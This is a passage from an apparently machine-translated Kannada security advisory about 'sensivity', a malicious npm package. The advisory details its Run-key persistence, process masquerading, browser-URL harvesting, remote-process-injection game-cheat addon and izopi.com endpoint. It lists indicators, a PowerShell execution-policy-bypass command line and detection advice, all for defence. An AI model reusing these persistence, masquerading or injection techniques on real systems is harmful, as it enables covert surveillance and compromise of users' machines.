ಪುನರಾವರ್ತಿಸುತ್ತದೆ ಮತ್ತು ಯಾವುದೇ ಬ್ರೌಸರ್ ಮುಂಭಾಗದಲ್ಲಿದೆಯೋ ಅದರ URL ಅಥವಾ ವಿಂಡೋ ಶೀರ್ಷಿಕೆಯನ್ನು ಹೊರತೆಗೆಯುತ್ತದೆ.
ಆ URL ಅನ್ನು ಒಂದೇ ಹಾರ್ಡ್-ಕೋಡೆಡ್ ಗುರಿಯ ವಿರುದ್ಧ ಪರೀಕ್ಷಿಸಲಾಗಿದೆ:
javascript const TARGET_YOUTUBE_VIDEO_ID = 'wJWta2lO0Lw'; YouTube ಅನ್ನು ತೋರಿಸುವ ಬ್ರೌಸರ್ ವಿಂಡೋಗಾಗಿ ಲಾಂಚರ್ ಮೂರು-ಸೆಕೆಂಡ್ ಲೂಪ್ನಲ್ಲಿ ಪೋಲ್ ಮಾಡುತ್ತದೆ ಮತ್ತು ರಚಿಸಲಾದ ಪವರ್ಶೆಲ್ ಆ ವೀಡಿಯೊ ID ಗೆ ಹೊಂದಿಕೆಯಾಗುವ Get-YouTubeBrowser / Test-TargetYouTubeUrl ಜೋಡಿಯನ್ನು ಹೊಂದಿರುತ್ತದೆ. ವೀಕ್ಷಿಸಬಹುದಾದ ಪರಿಣಾಮವು ಎರಡು ಪಟ್ಟು: ಸಕ್ರಿಯ ಬ್ರೌಸಿಂಗ್ URL ಅನ್ನು ಬಲಿಪಶುವಿನ ಪರದೆಯಿಂದ ಓದಲಾಗುತ್ತದೆ ಮತ್ತು ಒಂದು ನಿರ್ದಿಷ್ಟ YouTube ವೀಡಿಯೊದೊಂದಿಗೆ ಹೋಸ್ಟ್ನ ಸಂವಹನವನ್ನು ಕಂಡುಹಿಡಿಯಲಾಗುತ್ತದೆ. ನಾವು ಕಾರ್ಯವಿಧಾನ ಮತ್ತು ಗುರಿಯನ್ನು ವಿವರಿಸುತ್ತೇವೆ; ನಾವು ಅವರಿಂದ ಯಾವುದೇ ಉದ್ದೇಶವನ್ನು ಊಹಿಸುವುದಿಲ್ಲ.
ವಿಳಾಸ-ಪಟ್ಟಿಯು ಸ್ಕ್ಯಾನರ್ sensitive_data_enumeration ಅನ್ನು ಲೇಬಲ್ ಮಾಡುತ್ತದೆ - ಇದು ನೆಟ್ವರ್ಕ್-ಸಮರ್ಥ ರನ್ಟೈಮ್ ಅನ್ನು ಪೋಷಿಸುವ ಪ್ರಕ್ರಿಯೆ::env ಮತ್ತು UIAutomation ಮೂಲವಾಗಿದೆ. ಇದು ಪ್ರತ್ಯೇಕವಾಗಿ ಸೌಮ್ಯವಾಗಿ ಕಾಣುತ್ತದೆ ಮತ್ತು UIAutomation ಮೂಲದಿಂದ ಅಸ್ಪಷ್ಟ ಸರ್ವರ್ಗೆ ಡೇಟಾ ಜೀವನಚಕ್ರವನ್ನು ಪತ್ತೆಹಚ್ಚಿದ ನಂತರ ಮಾತ್ರ ಕಣ್ಗಾವಲುಗೆ ಪರಿಹರಿಸುತ್ತದೆ.
ಕಾಲರೇಖೆ ಮತ್ತು ಆವೃತ್ತಿ ವಿಕಸನ
ಸೂಕ್ಷ್ಮತೆಯು ಒಂದೇ ಬಾರಿಗೆ ಅಪ್ಲೋಡ್ ಆಗುವುದಿಲ್ಲ. ಪ್ರಕಾಶಕರ ಖಾತೆಯು ಈ ಒಂದೇ ಪ್ಯಾಕೇಜ್ನ ಸರಿಸುಮಾರು ಎಪ್ಪತ್ತು ಪ್ರಕಟಿತ ಆವೃತ್ತಿಗಳನ್ನು ಹೊಂದಿದೆ ಮತ್ತು ವಿಮರ್ಶೆ ವಿಂಡೋದ ಸಮಯದಲ್ಲಿ ಹೊಸವುಗಳು ಬರುತ್ತಲೇ ಇರುತ್ತವೆ. ಲಾಂಚರ್ 2.5.x ಸಾಲಿನಾದ್ಯಂತ ವೈಶಿಷ್ಟ್ಯದಿಂದ ವೈಶಿಷ್ಟ್ಯಕ್ಕೆ ಬೆಳೆಯುತ್ತದೆ, ಆದರೆ ಅದರ ಸ್ಥಿರತೆ ಮತ್ತು ಪೇಲೋಡ್-ಲೋಡಿಂಗ್ ಸ್ಥಿರವಾಗಿರುತ್ತದೆ.
| ದಿನಾಂಕ (UTC) | ಗಮನಿಸಿದ ಆವೃತ್ತಿಗಳು | ಲಾಂಚರ್ ಸ್ಥಿತಿ |
|---|---|---|
| 2026-06-02 | 2.5.8 - 2.5.46 (25) | ಬೇಸ್ QR-ಪ್ಯಾನಲ್ ಲಾಂಚರ್; ರನ್-ಕೀ ನಿರಂತರತೆ; ಮಸುಕಾದ ಸರ್ವರ್ನ ಮೌಲ್ಯಮಾಪನ. |
| 2026-06-03 | 2.5.53 - 2.5.61 (6) | ಅದೇ ಫಿಂಗರ್ಪ್ರಿಂಟ್; ಕನ್ಸೋಲ್-ಟ್ರೇಸ್ ಸಪ್ರೆಶನ್. |
| 2026-06-04 | 2.5.67, 2.5.68 (2) | ಪಿನ್ ಮಾಡಿದ YouTube ತೊಡಗಿಸಿಕೊಳ್ಳುವಿಕೆ ಗುರಿಯನ್ನು ಸೇರಿಸುತ್ತದೆ wJWta2lO0Lw. |
| 2026-06-05 | 2.5.0 - 2.5.69 (24) | ವ್ಯಾಪ್ತಿಯಾದ್ಯಂತ ಅಂತರ ತುಂಬುವಿಕೆ ಮರುಪ್ರಕಟಣೆ; ಮೇಲ್ವಿಚಾರಕ/ಕೆಲಸಗಾರರ ಕಾವಲುಗಾರ. |
ಡೌನ್ಲೋಡ್ ಮಾಡಿದ ಪ್ರತಿನಿಧಿಗಳಾದ 2.5.0, 2.5.36, ಮತ್ತು 2.5.69 -ಗಳಲ್ಲಿ ಲಾಂಚರ್ ಅನ್ನು ಓದುವುದು ನಾಲ್ಕು ಹಂತಗಳನ್ನು ತೋರಿಸುತ್ತದೆ. ಆರಂಭಿಕ ನಿರ್ಮಾಣಗಳು ಮೂಲ QR-ಜೋಡಿಸುವ ಲಾಂಚರ್ ಅನ್ನು ಹೊಂದಿವೆ. 2.5.33 ರಿಂದ UIAutomation ವಿಳಾಸ-ಬಾರ್ ಹಾರ್ವೆಸ್ಟರ್ ಕಾಣಿಸಿಕೊಳ್ಳುತ್ತದೆ. 2.5.58 ರಿಂದ ಮೇಲ್ವಿಚಾರಕ-ನಿರ್ವಹಣಾ ಪದರವನ್ನು ಸೇರಿಸಲಾಗುತ್ತದೆ. 2.5.64 ರಿಂದ ಬೇರ್ಪಟ್ಟ ಮೇಲ್ವಿಚಾರಕ/ಕೆಲಸದ ವಾಚ್ಡಾಗ್ ಸೆಟ್ ಅನ್ನು ಪೂರ್ಣಗೊಳಿಸುತ್ತದೆ. ಉದ್ದಕ್ಕೂ, ನಾಲ್ಕು ವಿಷಯಗಳು ಎಂದಿಗೂ ಬದಲಾಗುವುದಿಲ್ಲ: OneDriveUpdate ರನ್ ಕೀ, OneDrive.Standalone.Updater.vbs ಡ್ರಾಪ್ಪರ್, eval'd server.obf.js, ಮತ್ತು sens.node ಸ್ಥಳೀಯ ಮಾಡ್ಯೂಲ್.
2026-06-05 ರ ಅಲೆಯು ಗಮನಾರ್ಹವಾಗಿದೆ ಏಕೆಂದರೆ ಅದು ಕಡಿಮೆ ಆವೃತ್ತಿ ಸಂಖ್ಯೆಗಳನ್ನು - 2.5.0 ರಿಂದ 2.5.15 - ಮರು-ಪ್ರಕಟಿಸಿತು, ಅದು ಹಿಂದಿನ ದಿನಗಳ ದೃಢಪಡಿಸಿದ ಆವೃತ್ತಿಗಳಿಗಿಂತ ಕೆಳಗಿರುತ್ತದೆ. ಇದರ ಪರಿಣಾಮವು ನೋಂದಾವಣೆಯಲ್ಲಿ 2.5.x ರೇಖೆಯ ಪಕ್ಕದಲ್ಲಿದೆ, ಪ್ರತಿಯೊಂದು ಆವೃತ್ತಿಯು ಒಂದೇ ಲಾಂಚರ್ ಅನ್ನು ಹೊಂದಿರುತ್ತದೆ.
ರಾಜಿ ಸೂಚಕಗಳು
ಕೆಳಗಿನ ಎಲ್ಲಾ ಸೂಚಕಗಳನ್ನು ಪ್ಯಾಕೇಜ್ ಟಾರ್ಬಾಲ್ನಿಂದ ನೇರವಾಗಿ ಓದಲಾಗಿದೆ. ಓದಬಹುದಾದ ಲಾಂಚರ್ ಲೂಪ್ಬ್ಯಾಕ್ ಮತ್ತು ಒಂದೇ ಖಾಸಗಿ LAN ವಿಳಾಸವನ್ನು ಮಾತ್ರ ಹೊಂದಿರುತ್ತದೆ; server.obf.js ಅನ್ನು ಆಫ್ಲೈನ್ನಲ್ಲಿ ಡಿಯೋಬ್ಫಸ್ಕೇಟಿಂಗ್ ಮಾಡುವ ಮೂಲಕ izopi.com ಎಂಬ ಒಂದು ಬಾಹ್ಯ ಹೋಸ್ಟ್ ಹೆಸರನ್ನು ಮರುಪಡೆಯಲಾಗಿದೆ.
| ಪ್ರಕಾರ | ಸೂಚಕ | ಟಿಪ್ಪಣಿಗಳು |
|---|---|---|
| ಪ್ಯಾಕೇಜ್ | npm:sensivity (≈70 ಆವೃತ್ತಿಗಳು, 2.5.0-2.5.69) | ಏಕ-ಪ್ಯಾಕೇಜ್ ಪ್ರಕಾಶಕರು; ಯಾವುದೇ ಭಂಡಾರವಿಲ್ಲ; ಪರವಾನಗಿ ಪಡೆದಿಲ್ಲ. |
| ಫೈಲ್ | launcher.js | ಓದಬಲ್ಲ ಆರ್ಕೆಸ್ಟ್ರೇಟರ್; ಮುಖ್ಯ ಮತ್ತು ಬಿನ್ ಗುರಿ. |
| ಫೈಲ್ | server.obf.js (≈171 ಕೆಬಿ) | obfuscator.io RC4 ಸ್ಟ್ರಿಂಗ್-ಅರೇ ಪೇಲೋಡ್, ಇದರ ಮೂಲಕ ಲೋಡ್ ಮಾಡಲಾಗಿದೆ eval(fs.readFileSync(...)). |
| ಫೈಲ್ | sens.node (≈6.87 ಎಂಬಿ) | PE32+ x86-64 ನೋಡ್ N-API ಆಡ್ಆನ್; SHA-256 66b674884042fca2f056d06854325ea0e8bc902d4e3cdaeafd5fe08c7d0aab40. |
| ಫೈಲ್ | OneDrive.Standalone.Updater.vbs | ಮರೆಮಾಡಿದ ಮರುಪ್ರಾರಂಭಕ (node launcher.js). |
| ನೆಟ್ವರ್ಕ್ | https://izopi.com/check.php | ಅಸ್ಪಷ್ಟಗೊಳಿಸಿದ ಸರ್ವರ್ನಿಂದ ಪರವಾನಗಿ/ಪ್ರಮಾಣೀಕರಣ ಎಂಡ್ಪಾಯಿಂಟ್ ಅನ್ನು ಮರುಪಡೆಯಲಾಗಿದೆ; ಎಂಬೆಡೆಡ್ RSA ಸಾರ್ವಜನಿಕ ಕೀಲಿಯು ಪ್ರತಿಕ್ರಿಯೆಗಳನ್ನು ಪರಿಶೀಲಿಸುತ್ತದೆ. |
| ಸಾಮರ್ಥ್ಯ | OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread | ರಿಮೋಟ್-ಪ್ರೊಸೆಸ್ ಇಂಜೆಕ್ಷನ್ ಮತ್ತು ಮೆಮೊರಿ ಓದುವ/ಬರೆಯುವ ಸಾಮರ್ಥ್ಯ. |
| ಸಾಮರ್ಥ್ಯ | Enable Aimbot, Box ESP, Triggerbot, Vehicle ESP, Dear ImGui 1.91.3 WIP | DirectX 11 / ImGui ಆಟದ ಓವರ್ಲೇ ಐಮ್ಬಾಟ್, ESP ಮತ್ತು ಟ್ರಿಗ್ಗರ್ಬಾಟ್ ವೈಶಿಷ್ಟ್ಯಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುತ್ತದೆ. |
| ರಿಜಿಸ್ಟ್ರಿ | HKCU\Software\Microsoft\Windows\CurrentVersion\Run → OneDriveUpdate | ಸ್ವಯಂಪ್ರಾರಂಭ ಮೌಲ್ಯವು ಸೂಚಿಸುತ್ತದೆ wscript.exe ಮತ್ತು VBScript ಲಾಂಚರ್. |
| ಪ್ರಕ್ರಿಯೆ | process.title = 'Runtime Broker' | ಕಾನೂನುಬದ್ಧ ವಿಂಡೋಸ್ ರನ್ಟೈಮ್ ಬ್ರೋಕರ್ ಪ್ರಕ್ರಿಯೆಯಂತೆ ವೇಷ ಧರಿಸುತ್ತದೆ. |
| ವರ್ತನೆಯ | powershell -NoProfile -ExecutionPolicy Bypass -File <generated>.ps1 | ರಚಿಸಲಾದ ಪವರ್ಶೆಲ್ ಸ್ಕ್ರಿಪ್ಟ್ಗಳಿಗೆ ಬಳಸಲಾದ ಎಕ್ಸಿಕ್ಯೂಷನ್-ಪಾಲಿಸಿ ಬೈಪಾಸ್. |
| ವರ್ತನೆಯ | UIAutomation ValuePattern ಬ್ರೌಸರ್ ವಿಳಾಸ ಪಟ್ಟಿಯನ್ನು ಓದಿ | ಮುನ್ನೆಲೆ ಬ್ರೌಸರ್ ವಿಂಡೋದ URL ಅನ್ನು ಓದುತ್ತದೆ. |
| ವರ್ತನೆಯ | ಗುರಿ ವೀಡಿಯೊ ಐಡಿ wJWta2lO0Lw; 3-ಸೆಕೆಂಡ್ಗಳ YouTube ಸಮೀಕ್ಷೆ | ಪಿನ್ ಮಾಡಿದ ನಿಶ್ಚಿತಾರ್ಥ-ಮೇಲ್ವಿಚಾರಣಾ ಸಂಕೇತ. |
| ನೆಟ್ವರ್ಕ್ | http://localhost:3000, ಫಾಲ್ಬ್ಯಾಕ್ http://192.168.1.16:3000 | QR-ಜೋಡಿಸುವ ನಿಯಂತ್ರಣ ಫಲಕವನ್ನು ಸ್ಥಳೀಯವಾಗಿ ಮತ್ತು LAN ನಲ್ಲಿ ಬಹಿರಂಗಪಡಿಸಲಾಗಿದೆ. |
| ಪರಿಸರ | SENSIVITY_SUPERVISOR, SENSIVITY_WORKER | ಬೇರ್ಪಟ್ಟ ಕಾವಲುಗಾರ ಪ್ರಕ್ರಿಯೆ ಸಮನ್ವಯ ಧ್ವಜಗಳು. |
ಗುಣಲಕ್ಷಣ, ಪರಿಣಾಮ ಮತ್ತು ರಕ್ಷಕರು
ಈ ಪ್ಯಾಕೇಜ್ ಅನ್ನು ಒಂದೇ npm ಖಾತೆಯಿಂದ ಪ್ರಕಟಿಸಲಾಗಿದೆ, ಅದರ ಇಮೇಲ್ ಪರಿಶೀಲಿಸದ Gmail ವಿಳಾಸವಾಗಿದೆ. ಖಾತೆಯು ತೀವ್ರವಾಗಿ ನಕಾರಾತ್ಮಕ ನೋಂದಾವಣೆ ಖ್ಯಾತಿ ಸ್ಕೋರ್ ಅನ್ನು ಹೊಂದಿದೆ, ಈ ಒಂದು ಪ್ಯಾಕೇಜ್ ಅನ್ನು ಮಾತ್ರ ನಿರ್ವಹಿಸುತ್ತದೆ ಮತ್ತು ಪ್ರಕಟಿಸುತ್ತದೆ ಮತ್ತು ಯಾವುದೇ ಲಿಂಕ್ ಮಾಡಲಾದ ಮೂಲ ಭಂಡಾರವನ್ನು ಹೊಂದಿಲ್ಲ. ನಾವು ಇಮೇಲ್ನ ಮಾಲೀಕತ್ವವನ್ನು ಪರಿಶೀಲಿಸಿಲ್ಲ ಮತ್ತು ನಾವು ಅಭಿಯಾನವನ್ನು ಯಾವುದೇ ಹೆಸರಿಸಲಾದ ವ್ಯಕ್ತಿಗೆ ಅಲ್ಲ, ಪ್ರಕಾಶಕರ ಖಾತೆಗೆ ಆರೋಪಿಸುತ್ತೇವೆ. ಲಾಂಚರ್ ಯಾವುದೇ ಸ್ಪಷ್ಟ ಪಠ್ಯ ಮೂಲಸೌಕರ್ಯವನ್ನು ಹೊಂದಿಲ್ಲ, ಆದರೆ ಒಂದು ಬಾಹ್ಯ ಹೋಸ್ಟ್ ಈಗ ತಿಳಿದಿದೆ: ಅಸ್ಪಷ್ಟ ಸರ್ವರ್ ಪರವಾನಗಿ ಪರಿಶೀಲನೆಗಾಗಿ izopi.com ಅನ್ನು ಸಂಪರ್ಕಿಸುತ್ತದೆ ಮತ್ತು ಸ್ಥಳೀಯ ಮಾಡ್ಯೂಲ್ - ಸೂಚನೆ-ಮೂಲಕ-ಸೂಚನೆಯ ಬದಲಿಗೆ ಅದರ ಆಮದು ಕೋಷ್ಟಕ ಮತ್ತು ಸ್ಟ್ರಿಂಗ್ಗಳಿಂದ ಓದಲಾಗುತ್ತದೆ - ಇದು ಮತ್ತೊಂದು ಪ್ರಕ್ರಿಯೆಯ ಮೆಮೊರಿಗೆ ಇಂಜೆಕ್ಟ್ ಮಾಡುವ ಮತ್ತು ಓದುವ ಆಟದ ಓವರ್ಲೇ ಆಗಿದೆ.
ನಿಯಂತ್ರಣ ಫಲಕ ಉಪಯುಕ್ತತೆಯನ್ನು ನಿರೀಕ್ಷಿಸಿ, ಸೂಕ್ಷ್ಮತೆಯನ್ನು ಸ್ಥಾಪಿಸಿ ಚಲಾಯಿಸುವ ವಿಂಡೋಸ್ ಬಳಕೆದಾರರ ಮೇಲೆ ಗಮನಿಸಬಹುದಾದ ಪರಿಣಾಮ ಬೀರುತ್ತದೆ. ಆ ಹೋಸ್ಟ್ಗಳಲ್ಲಿ ಪ್ಯಾಕೇಜ್ ಒನ್ಡ್ರೈವ್ ಕಾರ್ಯದಂತೆ ವೇಷ ಧರಿಸಿ ಆಟೋಸ್ಟಾರ್ಟ್ ಪರ್ಸಿಸ್ಟೆನ್ಸ್ ಅನ್ನು ಸ್ಥಾಪಿಸುತ್ತದೆ, ಸಿಸ್ಟಮ್ ಪ್ರಕ್ರಿಯೆಯನ್ನು ಅನುಕರಿಸಲು ಸ್ವತಃ ಮರುಹೆಸರಿಸುತ್ತದೆ, ಬಳಕೆದಾರರು ಬ್ರೌಸ್ ಮಾಡುತ್ತಿರುವ ಯಾವುದೇ URL ಅನ್ನು ಓದುತ್ತದೆ ಮತ್ತು ಸ್ಥಳೀಯ ನೆಟ್ವರ್ಕ್ ಮೂಲಕ ಯಂತ್ರವನ್ನು ರಿಮೋಟ್ಗೆ ಬಂಧಿಸುವ ಪೇರಿಂಗ್ ಪ್ಯಾನೆಲ್ ಅನ್ನು ಸ್ಥಾಪಿಸುತ್ತದೆ. ಮೇಲ್ವಿಚಾರಕ/ಕೆಲಸಗಾರ ವಾಚ್ಡಾಗ್ ಎಂದರೆ ಒಂದೇ ಪ್ರಕ್ರಿಯೆಯ ಕಿಲ್ ಅದನ್ನು ತೆಗೆದುಹಾಕುವುದಿಲ್ಲ; ರನ್-ಕೀ ನಮೂದು ರೀಬೂಟ್ಗಳನ್ನು ಉಳಿದುಕೊಂಡಿರುತ್ತದೆ. ಮ್ಯಾಕೋಸ್ ಮತ್ತು ಲಿನಕ್ಸ್ ಅನ್ನು ಲಾಂಚರ್ ಗುರಿಯಾಗಿಸಿಕೊಂಡಿಲ್ಲ - ಪರ್ಸಿಸ್ಟೆನ್ಸ್, ಪವರ್ಶೆಲ್ ಮತ್ತು ಯುಐಆಟಮೇಷನ್ ಮಾರ್ಗಗಳು ವಿಂಡೋಸ್-ಮಾತ್ರ.
ಎಪ್ಪತ್ತು ಆವೃತ್ತಿಗಳ ಮಂಥನವು ಗಮನ ಸೆಳೆಯುವ ಪ್ರವೃತ್ತಿಯಾಗಿದೆ. ಕೆಲವು ದಿನಗಳಲ್ಲಿ ಒಂದು ಪ್ಯಾಕೇಜ್ ಅನ್ನು ಡಜನ್ಗಟ್ಟಲೆ ಬಾರಿ ಮರು-ಪ್ರಕಟಿಸುವುದು, ಈಗಾಗಲೇ ತೆಗೆದುಹಾಕಲಾದ ಆವೃತ್ತಿ ಸಂಖ್ಯೆಗಳಿಗಿಂತ ಕೆಳಗಿನ ಬ್ಯಾಕ್-ಫಿಲ್ಲಿಂಗ್ ಆವೃತ್ತಿ ಸಂಖ್ಯೆಗಳನ್ನು ಒಳಗೊಂಡಂತೆ, ತೆಗೆದುಹಾಕುವಿಕೆಗಳ ನಡುವೆ ನೋಂದಾವಣೆಯಲ್ಲಿ ಲೈವ್ ಪ್ರತಿಯನ್ನು ಇಡುತ್ತದೆ ಮತ್ತು ಆವೃತ್ತಿ-ಪಿನ್ ಮಾಡಿದ ಬ್ಲಾಕ್ಲಿಸ್ಟ್ಗಳನ್ನು ನಿರಾಶೆಗೊಳಿಸುತ್ತದೆ. sensivity@2.5.61 ಗಾಗಿ ಬ್ಲಾಕ್ಲಿಸ್ಟ್ ನಮೂದು ಮರುದಿನ ಮರುಪ್ರಕಟಿಸಿದ sensivity@2.5.3 ವಿರುದ್ಧ ಏನನ್ನೂ ಮಾಡುವುದಿಲ್ಲ.
ರಕ್ಷಕರು ಈ ಕೆಳಗಿನವುಗಳ ಮೇಲೆ ಕಾರ್ಯನಿರ್ವಹಿಸಬಹುದು:
- ರಿಜಿಸ್ಟ್ರಿ-ಪ್ರಾಕ್ಸಿ ಮತ್ತು CI ಅನುಮತಿ ಪಟ್ಟಿಗಳಲ್ಲಿ ಪ್ಯಾಕೇಜ್ ಹೆಸರಿನ ಸೂಕ್ಷ್ಮತೆಯನ್ನು ಸಂಪೂರ್ಣವಾಗಿ ನಿರ್ಬಂಧಿಸಿ. ಪ್ರತ್ಯೇಕ ಆವೃತ್ತಿಗಳನ್ನು ಪಿನ್ ಮಾಡುವುದರಿಂದ ಮರುಪ್ರಕಟಣೆಯ ಕ್ಯಾಡೆನ್ಸ್ಗೆ ನಷ್ಟವಾಗುತ್ತದೆ; ಹೆಸರು ಬಾಳಿಕೆ ಬರುವ ಸೂಚಕವಾಗಿದೆ.
- ಪ್ರತಿ-ಬಳಕೆದಾರ ಮಾರ್ಗದಲ್ಲಿ .vbs ವಿರುದ್ಧ wscript.exe ಅನ್ನು ಆಹ್ವಾನಿಸುವ ಡೇಟಾ ಹೊಂದಿರುವ OneDriveUpdate ಹೆಸರಿನ ರನ್ ಮೌಲ್ಯವನ್ನು ಹುಡುಕಿ. ನಿಜವಾದ OneDrive ಅಪ್ಡೇಟರ್ ಅನ್ನು ಈ ರೀತಿಯಲ್ಲಿ ನೋಂದಾಯಿಸಲಾಗಿಲ್ಲ.
- process.title ಅನ್ನು Runtime Broker ಎಂದು ಹೊಂದಿರುವ Node.js ಪ್ರಕ್ರಿಯೆಯ ಕುರಿತು ಎಚ್ಚರಿಕೆ. ನಿಜವಾದ ಬ್ರೋಕರ್ RuntimeBroker.exe ಆಗಿದೆ, Node runtime ಅಲ್ಲ.
- ಸಂಕಲಿಸಿದ .node addon ಜೊತೆಗೆ .obf.js ಫೈಲ್ನ eval(fs.readFileSync(…)) ಅನ್ನು ರವಾನಿಸುವ ಪ್ಯಾಕೇಜ್ಗಳ npm ಸ್ಥಾಪನೆ-ಸಮಯವನ್ನು ಫ್ಲ್ಯಾಗ್ ಮಾಡಿ. ಆ ಜೋಡಣೆ - ಅಸ್ಪಷ್ಟ ಪಠ್ಯ ಪೇಲೋಡ್ನ ಪಕ್ಕದಲ್ಲಿ ಲೋಡ್ ಮಾಡಲಾದ ಅಪಾರದರ್ಶಕ ಸ್ಥಳೀಯ ಬೈನರಿ - ಯಾವುದೇ ಸ್ಟ್ರಿಂಗ್ IOC ಯಿಂದ ಸ್ವತಂತ್ರವಾಗಿ ಇಲ್ಲಿ ರಚನಾತ್ಮಕ ಹೇಳಿಕೆಯಾಗಿದೆ.
- ಅನಿರೀಕ್ಷಿತ ನೋಡ್ ಪ್ರಕ್ರಿಯೆಯಿಂದ ಉತ್ಪತ್ತಿಯಾಗುವ ಪೋರ್ಟ್ 3000 ನಲ್ಲಿ ಸ್ಥಳೀಯವಾಗಿ ಬೌಂಡ್ ಆಗಿರುವ ಯಾವುದೇ ಕೇಳುಗರನ್ನು ನಿರ್ವಹಿಸಲಾದ ವಿಂಡೋಸ್ ಎಂಡ್ಪಾಯಿಂಟ್ಗಳಲ್ಲಿ ಶಂಕಿತ ಎಂದು ಪರಿಗಣಿಸಿ.
- ಡೆವಲಪರ್ ಅಥವಾ ಅಂತಿಮ-ಬಳಕೆದಾರ ಹೋಸ್ಟ್ಗಳಿಂದ izopi.com ಗೆ ಹೊರಹೋಗುವ ವಿನಂತಿಗಳನ್ನು ನಿರ್ಬಂಧಿಸಿ ಅಥವಾ ಎಚ್ಚರಿಸಿ; ಇದು ಪ್ಯಾಕೇಜ್ನ ಏಕೈಕ ಬಾಹ್ಯ ಎಂಡ್ಪಾಯಿಂಟ್ ಆಗಿದ್ದು, ಅಸ್ಪಷ್ಟ ಸರ್ವರ್ನಿಂದ /check.php ನಲ್ಲಿ ತಲುಪಲಾಗುತ್ತದೆ.
- ಯಾವುದೇ ಬಂಡಲ್ ಮಾಡಲಾದ .node addon ಗಾಗಿ, ಅದನ್ನು ನಂಬುವ ಮೊದಲು ಅದರ ಆಮದು ಕೋಷ್ಟಕವನ್ನು ಪರೀಕ್ಷಿಸಿ. OpenProcess + VirtualAllocEx + WriteProcessMemory + CreateRemoteThread ಸಂಯೋಜನೆಯು ಪ್ಯಾಕೇಜ್ ಏನು ಮಾಡುತ್ತದೆ ಎಂದು ಹೇಳಿಕೊಂಡರೂ ರಿಮೋಟ್-ಪ್ರೊಸೆಸ್ ಇಂಜೆಕ್ಷನ್ ಆಗಿದೆ; ಇಲ್ಲಿ ಅದು Direct3D ಓವರ್ಲೇ ಮತ್ತು aimbot/ESP/triggerbot ಸ್ಟ್ರಿಂಗ್ಗಳ ಪಕ್ಕದಲ್ಲಿದೆ.
ಸ್ಥಿರ ವಿಶ್ಲೇಷಣೆಗಾಗಿ pipelineರು, ಆವೃತ್ತಿಯಾದ್ಯಂತ ಕನ್ವಿಕ್ಷನ್ ಆಕಾರವು ಬಾಳಿಕೆ ಬರುತ್ತದೆ: ನೆಟ್ವರ್ಕ್ ಅಲ್ಲದ ಸ್ಥಾಪನೆ ಪ್ರೊಫೈಲ್, ತಿಳಿದಿರುವ ಸಿಸ್ಟಮ್-ಪ್ರಕ್ರಿಯೆಯ ಹೆಸರಿಗೆ ಪ್ರಕ್ರಿಯೆ-ಶೀರ್ಷಿಕೆ ನಿಯೋಜನೆ, ಪವರ್ಶೆಲ್ ಮೂಲಕ ರನ್-ಕೀ ಬರೆಯುವಿಕೆ ಮತ್ತು ಡಿಸ್ಕ್ನಿಂದ ಓದಲಾದ ಫೈಲ್ನ ಮೌಲ್ಯಮಾಪನ. ಅವುಗಳಲ್ಲಿ ಯಾವುದೂ ಡೊಮೇನ್, ಐಪಿ ಅಥವಾ ಮುಂದಿನ ಮರುಪ್ರಕಟಣೆಯು ತಿರುಗಿಸಬಹುದಾದ ಆವೃತ್ತಿ ಸಂಖ್ಯೆಯನ್ನು ಅವಲಂಬಿಸಿಲ್ಲ.
ಉಲ್ಲೇಖಗಳು
[npm: ಸೂಕ್ಷ್ಮತೆ] – ಇಲ್ಲಿ ಚರ್ಚಿಸಲಾದ ಪ್ಯಾಕೇಜ್ ಆವೃತ್ತಿ ಸಾಲಿನ ನೋಂದಾವಣೆ ಪುಟ; ತೆಗೆದುಹಾಕುವಿಕೆಗೆ ಒಳಪಟ್ಟಿರುತ್ತದೆ.





